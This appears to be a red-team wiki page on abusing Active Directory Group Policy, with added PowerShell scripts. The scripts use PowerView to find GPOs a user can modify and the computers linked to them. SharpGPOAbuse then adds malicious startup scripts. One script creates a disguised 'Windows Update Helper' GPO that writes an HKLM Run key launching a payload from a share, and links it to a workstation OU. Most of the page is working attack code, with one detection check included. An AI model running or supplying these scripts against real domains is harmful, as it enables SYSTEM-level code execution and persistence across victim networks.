GPO Modification attacks - CraigDonkin/Infrastructure GitHub Wiki
Get-DomainGPO (PowerView)
- Enumerate GPOs where a principal has modify privileges. The rights that matter are WriteProperty (on gPCFileSysPath/versionNumber, or on all properties) and CreateChild, plus GenericAll, GenericWrite, WriteDacl and WriteOwner, which imply them. The filter below also returns the default ACEs for SYSTEM, Domain Admins and Enterprise Admins, so check the SecurityIdentifier of every hit before getting excited:
```powershell
Get-DomainGPO | Get-DomainObjectAcl -ResolveGUIDs | ? { $_.ActiveDirectoryRights -match "CreateChild|WriteProperty" }
```
- Resolve the GPO name (from the ObjectDN of the ACE) and the trustee (from its SecurityIdentifier):
```powershell
Get-DomainGPO -Identity "<objectDN>"
ConvertFrom-SID <SID>
```
- Enumerate the OUs the GPO is linked to and the computers under them. The GUID is the GPO's name attribute (the `{...}` CN), which is what the OU's gPLink attribute stores:
```powershell
Get-DomainOU -GPLink "<GUID>"
Get-DomainComputer -SearchBase "<Distinguished name of OU>"
```
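The enumeration steps above chained together, as an added example that is not part of the original wiki page. It assumes PowerView is already imported (Get-DomainGPO, Get-DomainObjectAcl, Get-DomainOU, Get-DomainComputer, ConvertFrom-SID) and that the current user is the principal of interest; the SID patterns used to drop default administrative ACEs are an assumption you may want to widen.

```powershell
# Added example, not from the original page. Requires PowerView to be loaded.
# Step 1: every ACE on every GPO that allows changing the GPO's contents or ACL,
# directly (WriteProperty/CreateChild) or by implication (GenericAll/Write, WriteDacl/Owner).
$modifyRights = 'GenericAll|GenericWrite|WriteDacl|WriteOwner|WriteProperty|CreateChild'

# Default ACEs to ignore: SYSTEM, Domain Admins (RID 512), Enterprise Admins (RID 519).
# Assumption: these are the only noise entries in this domain; extend as needed.
$ignoreSids = '^S-1-5-18$|-512$|-519$'

$writableGpos = Get-DomainGPO |
    Get-DomainObjectAcl -ResolveGUIDs |
    Where-Object {
        $_.ActiveDirectoryRights -match $modifyRights -and
        $_.SecurityIdentifier -notmatch $ignoreSids
    } |
    ForEach-Object {
        # Step 2: resolve the GPO display name from the ACE's ObjectDN and the trustee from its SID.
        $gpo = Get-DomainGPO -Identity $_.ObjectDN
        [pscustomobject]@{
            GpoDn    = $_.ObjectDN
            GpoName  = $gpo.displayname
            GpoGuid  = $gpo.name                  # the {GUID} CN that gPLink references
            Trustee  = ConvertFrom-SID $_.SecurityIdentifier
            Rights   = $_.ActiveDirectoryRights
            Property = $_.ObjectAceType           # e.g. GPC-File-Sys-Path, or All/empty for all properties
        }
    }

$writableGpos | Format-Table -AutoSize

# Step 3: for each writable GPO, find the OUs it is linked to and the computers under them.
$targets = foreach ($g in ($writableGpos | Sort-Object GpoGuid -Unique)) {
    foreach ($ou in (Get-DomainOU -GPLink $g.GpoGuid)) {
        $computers = Get-DomainComputer -SearchBase $ou.distinguishedname -Properties dnshostname
        [pscustomobject]@{
            GpoName   = $g.GpoName
            LinkedOU  = $ou.distinguishedname
            Computers = ($computers.dnshostname -join ', ')
        }
    }
}

$targets | Format-Table -AutoSize
```

Note that a link on a parent OU (or the domain root) also applies to child OUs, so a GPO that shows no direct link to the OU you care about may still reach it through inheritance; Get-DomainOU -GPLink only reports direct links.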
https://github.com/FSecureLABS/SharpGPOAbuse
```powershell
SharpGPOAbuse.exe <AttackType> <AttackOptions>
```
- Example: add a computer startup script to a GPO you can modify. Startup scripts only run when the computer boots, so the payload fires after the next reboot of a linked machine; if you need execution at the next policy refresh instead, use --AddComputerTask (an immediate scheduled task).
```powershell
SharpGPOAbuse.exe --AddComputerScript --ScriptName StartupScript.bat --ScriptContents "<malicious command to run>" --GPOName "<GPONAME>"
```
- Example ScriptContents that runs a file from a share (the computer account of the target must be able to read the share, since startup scripts run as SYSTEM):
```bat
Start /b <filepath>.exe
```
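A check to run after the SharpGPOAbuse step above, as an added example that is neither the wiki page's nor SharpGPOAbuse's own code. It reads back what a startup-script modification leaves behind in SYSVOL and on the GPO object, which is both how the attacker confirms the change landed and what a defender would diff. It assumes PowerView (Get-DomainGPO) is loaded; the GPO name is a placeholder.

```powershell
# Added example, not from the original page. Requires PowerView to be loaded.
function Get-GpoStartupScriptState {
    param([Parameter(Mandatory)][string]$GpoName)

    $gpo = Get-DomainGPO -Identity $GpoName -Properties name,displayname,gpcfilesyspath,gpcmachineextensionnames,versionnumber
    if (-not $gpo) { throw "GPO '$GpoName' not found" }

    # Computer startup scripts live under <SYSVOL path>\Machine\Scripts\Startup and are
    # registered in Machine\Scripts\scripts.ini; SYSVOL is readable by every domain member.
    $scriptsDir = Join-Path $gpo.gpcfilesyspath 'Machine\Scripts'
    $iniPath    = Join-Path $scriptsDir 'scripts.ini'
    $startupDir = Join-Path $scriptsDir 'Startup'

    [pscustomobject]@{
        Gpo               = $gpo.displayname
        SysvolPath        = $gpo.gpcfilesyspath
        # Clients only reprocess a GPO whose versionNumber increased since they last applied it.
        VersionNumber     = $gpo.versionnumber
        # The Scripts client-side extension GUIDs must be listed here or the scripts are never run.
        MachineExtensions = $gpo.gpcmachineextensionnames
        ScriptsIni        = if (Test-Path $iniPath) { Get-Content $iniPath -Raw } else { '<absent>' }
        StartupScripts    = if (Test-Path $startupDir) { (Get-ChildItem $startupDir -File -Force).Name -join ', ' } else { '<absent>' }
    }
}

# Placeholder GPO name.
Get-GpoStartupScriptState -GpoName 'Workstations Policy' | Format-List
```

If ScriptsIni shows the script but MachineExtensions lacks the scripts extension, or VersionNumber did not change, linked machines will ignore the edit. Defenders can run the same function on a schedule and alert on any GPO whose Machine\Scripts content or versionNumber changes outside a change window.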
Creating a new GPO
- Look for users/groups who can create new GPOs in the domain, i.e. who hold CreateChild for groupPolicyContainer objects (or GenericAll) on the policies container, CN=Policies,CN=System,<domain DN>. Domain Admins and the Group Policy Creator Owners group have this by default.
- A newly created GPO does nothing until it is linked. Linking it to an OU requires WriteProperty on that OU's gPLink attribute (or GenericAll/GenericWrite on the OU), so also enumerate who holds that on the OU containing the target computers.
- If the RSAT GroupPolicy PowerShell module is installed, the New-GPO cmdlet creates the GPO and Set-GPPrefRegistryValue adds a Group Policy Preference registry item that writes an HKLM autorun key on every linked computer. The value is an ExpandString so environment variables in the command are expanded; the Run key fires at the next interactive logon after the client has applied the GPO (gpupdate /force, or the default refresh interval).
```powershell
New-GPO -Name <name>
Set-GPPrefRegistryValue -Name <name of GPO> -Context Computer -Action Create -Key "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" -ValueName "Updater" -Value "<malicious command to run>" -Type ExpandString
```
- Example malicious command:
```
C:\Windows\System32\cmd.exe /c <malicious payload>
```
- Link the GPO to the target OU (by distinguished name):
```powershell
Get-GPO -Name <name of GPO> | New-GPLink -Target "<OU DN>"
```
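The create-configure-link procedure above with its two prerequisite checks in front of it, as an added example that is not part of the original wiki page. It assumes PowerView (Get-DomainObjectAcl) and the RSAT GroupPolicy module are both loaded, and that the current token is the principal being tested. The OU, GPO name, payload path and the schema names used to match ACE object types (Group-Policy-Container, GP-Link, as PowerView resolves them with -ResolveGUIDs) are assumptions.

```powershell
# Added example, not from the original page. Requires PowerView and the GroupPolicy module.
$domainDn = ([ADSI]'LDAP://RootDSE').defaultNamingContext
$policies = "CN=Policies,CN=System,$domainDn"
$targetOu = "OU=Workstations,$domainDn"          # placeholder: OU holding the target computers

# SIDs of the current user and every group in its token.
$me     = [System.Security.Principal.WindowsIdentity]::GetCurrent()
$mySids = @($me.User.Value) + @($me.Groups | ForEach-Object { $_.Value })

# Check 1: CreateChild for groupPolicyContainer objects (or GenericAll) on CN=Policies.
# An ACE without ObjectAceType is not object-specific and covers all child classes.
$canCreate = Get-DomainObjectAcl -Identity $policies -ResolveGUIDs | Where-Object {
    $_.SecurityIdentifier -in $mySids -and
    $_.ActiveDirectoryRights -match 'GenericAll|CreateChild' -and
    (-not $_.ObjectAceType -or $_.ObjectAceType -match '^(Group-Policy-Container|All)$')   # assumed schema name
}

# Check 2: write access to the gPLink attribute of the target OU.
$canLink = Get-DomainObjectAcl -Identity $targetOu -ResolveGUIDs | Where-Object {
    $_.SecurityIdentifier -in $mySids -and (
        $_.ActiveDirectoryRights -match 'GenericAll|GenericWrite' -or
        ($_.ActiveDirectoryRights -match 'WriteProperty' -and
         (-not $_.ObjectAceType -or $_.ObjectAceType -match '^(GP-Link|All)$'))   # assumed schema name
    )
}

if (-not $canCreate) { throw "No right to create groupPolicyContainer objects under $policies" }
if (-not $canLink)   { throw "No right to write gPLink on $targetOu" }

# Step 3: create the GPO, add the HKLM Run value as a Group Policy Preference, link it.
$gpoName = 'Windows Update Helper'               # placeholder: choose a name that blends in
$gpo = New-GPO -Name $gpoName -Comment 'Update helper'

Set-GPPrefRegistryValue -Name $gpoName -Context Computer -Action Create `
    -Key 'HKLM\Software\Microsoft\Windows\CurrentVersion\Run' `
    -ValueName 'Updater' -Type ExpandString `
    -Value 'C:\Windows\System32\cmd.exe /c \\fileserver\share\payload.exe' | Out-Null   # placeholder payload

$gpo | New-GPLink -Target $targetOu -LinkEnabled Yes | Out-Null

# Confirm the link and the preference item exist before waiting on policy refresh.
Get-GPInheritance -Target $targetOu | Select-Object -ExpandProperty GpoLinks | Where-Object DisplayName -eq $gpoName
Get-GPPrefRegistryValue -Name $gpoName -Context Computer -Key 'HKLM\Software\Microsoft\Windows\CurrentVersion\Run'
```

The value only runs after a linked computer has refreshed policy and a user has logged on interactively, so allow for the refresh interval or trigger gpupdate /force where you already have a foothold. Remove-GPLink followed by Remove-GPO reverts the change; the Run value itself stays on machines that already applied it until the preference is deleted or the key is cleaned up.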